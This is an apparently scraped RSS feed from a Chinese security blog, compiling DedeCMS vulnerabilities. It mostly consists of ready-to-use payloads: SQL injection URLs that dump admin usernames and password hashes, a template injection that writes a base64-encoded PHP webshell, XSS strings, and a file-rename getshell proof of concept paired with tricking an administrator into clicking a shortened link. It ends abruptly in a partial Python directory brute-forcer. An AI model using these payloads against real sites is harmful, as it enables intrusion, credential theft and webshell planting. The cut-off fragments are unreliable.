织梦 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 23 Aug 2019 01:26:10 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 dedecms漏洞汇总 /web/396.html Fri, 13 Apr 2018 02:38:00 +0000 /?p=325

@泡泡龙等了很久的文章了,如果本文有错欢迎评论指点,欢迎补充。

Dedecms V5.7 后台文件重命名

/web/81/

Dedecms V5.7 后台任意代码执行

/web/79/

解决历史难题 – DEDECMS 织梦找后台目录

/web/51/

dedecms爆绝对路径

/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php

以下漏洞来自互联网收集

DedeCMS全版本通杀SQL注入漏洞利用

2016年7月11日
http://www.weixianmanbu.com/article/157.html

Dedecms 5.6 rss注入漏洞

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1

DedeCms v5.6 嵌入恶意代码执行漏洞

注册会员,上传软件:本地地址中填入

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}

发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密码xiao,直接生成一句话。

Dede 5.6 GBK SQL注入漏洞

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/>
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''">

可看见错误信息

  1. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
  1. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是

按确定后的看到第2步骤的信息表示文件木马上传成功.

织梦(DedeCms)plus/infosearch.php 文件注入漏洞

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

DEDECMS跨站及爆绝对路径漏洞
提交:

http://127.0.0.1/dc/include/jump.php?gurl= 会跳转到/

新手朋友会认为这就是这个跨站的利用了,其实不然,我们可以尝试去闭合他!但PHP有gpc限制,我们该怎么绕?
提交:

http://127.0.0.1/dc/include/jump.php?gurl=%23"alert(/00day.cn/)/*

Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x

# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]

Php Path Discusion

[DedeCms WebSite]/include/dialog/

XSRF

[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker wright a "end of textarea"  tag thats give XSS alert :)
[XSS Code] :'">alert(document.cookie)

织梦(dedecms)2007 group/search.php注入漏洞

http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'
]]> Dedecms V5.7 后台文件重命名[CVE-2018-9134] /web/392.html Sun, 01 Apr 2018 15:50:38 +0000 /?p=321

原文地址 https://xz.aliyun.com/t/2234

Dedecms V5.7版本后台可实现对于文件的重命名,可将上传的任意文件重名为php文件,导致getshell。

该漏洞的逻辑比较简单,就从漏洞的入口文件开始看,漏洞的入口文件是dede/file_manage_control.php,其部分源码如下:

重点就在于这里的if,由于dede采取的是伪全局变量注册机制,导致在未经过滤的情况下我们可声明任意变量。在该文件中,前面只是简单的验证身份是否正确,并没有对于变量进行任何过滤。也就是说,我们可控$fmdo,$oldfilename,$newfilename这三个变量。

跟进RenameFile方法,文件位于dede/file_class.php

在这个方法中,对于传入的变量只是进行参数拼接操作,就是我们传入的参数前加上web服务的根目录的绝对路径。对于之后的变量没有任何过滤。导致我们可操作自行上传的文件。从而实现将任意类型文件重命名为php文件。

利用方式:
首先随便找个上传点,上传合法文件。获取上传之后的文件路径。
这里我找的是前台->会员中心->附件管理,从这上传一个zip文件,内容就是phpinfo()

可以在源码里看到上传文件的路径:

接下来构造触发重命名payload:
将文件路径的值填入oldfilename参数,这里注意不要加反斜杠
newfilename的值就是我们要生成的木马文件的名称。(由于我的dede并不是放在web服务的根目录下,因此我这里需要加上dedecms/)
fmdo构造为rename即可
最终生成以下poc:

http://localhost/dedecms2/dede/file_manage_control.php?fmdo=rename&oldfilename=dedecms2/uploads/userup/1/151QM125-42I.zip&newfilename=dedecms2/wisdom.php

执行之后访问:http://localhost/dedecms2/wisdom.php

配合存储型xss可getshell。

修复方案:在file_class.php中过滤$newname参数,或者file_manage_control.php中过滤$newfilename参数,判断文件后缀是否为php

mochazz:可以利用这个文件名任意修改的漏洞结合CSRF以及一点点社工手段打出组合拳。具体手法如下:

  • 利用dede前台会员上传点上传文件,获取路径
  • 构造攻击url
  • 将一长长的恶意url变成短连接
  • 社工网站管理员,让其点击
  • 成功getshell

不过有一点不够隐蔽,就是在管理员点击链接后,会提示成功修改文件名,这个可能会引起细心的管理员的警觉。

]]> 解决历史难题-DEDECMS织梦找后台目录 /web/363.html Mon, 26 Feb 2018 21:15:00 +0000 /?p=253

原文 https://xianzhi.aliyun.com/forum/topic/2064

利用限制

仅针对windows系统

进入正题

首先看核心文件common.inc.php 大概148行左右

if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}

uploadsafe.inc.php

if( preg_match('#^(cfg_|GLOBALS)#', $_key) )
{
    exit('Request var not allow for uploadsafe!');
}
$$_key = $_FILES[$_key]['tmp_name']; //获取temp_name
${$_key.'_name'} = $_FILES[$_key]['name'];
${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);
if(!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})) )
{
    if(!defined('DEDEADMIN'))
    {
        exit('Not Admin Upload filetype not allow !');
    }
}
if(empty(${$_key.'_size'}))
{
    ${$_key.'_size'} = @filesize($$_key);
}
$imtypes = array
(
    "image/pjpeg", "image/jpeg", "image/gif", "image/png",
    "image/xpng", "image/wbmp", "image/bmp"
);
if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))
{
    $image_dd = @getimagesize($$_key);
    //问题就在这里,获取文件的size,获取不到说明不是图片或者图片不存在,不存就exit upload.... ,利用这个逻辑猜目录的前提是目录内有图片格式的文件。
    if (!is_array($image_dd))
    {
        exit('Upload filetype not allow !');
    }
}
......

注意$$_key这一句,变量$key取自于$_FILE,由于$_FILE可控自然$key也可控,此处理论上是可以覆盖任意变量,但是前面有个正则判断不能出现cfg_|GLOBALS。(但是应该还可以覆盖其他变量此处感觉还可以深挖)

本人出发点是找个可以利用

![3.png][3]
# Python版本

!/usr/bin/env python3

fixed bug by ChaBug

author = Mochazz

import requests
import itertools
characters = “abcdefghijklmnopqrstuvwxyz0123456789_!~@$-+=()” #加上了乱七八糟的符号
back_dir = “”
flag = 0
url = “http://192.168.1.9/tags.php”
data = {

"_FILES[mochazz][tmp_name]" : "./{p}
]]>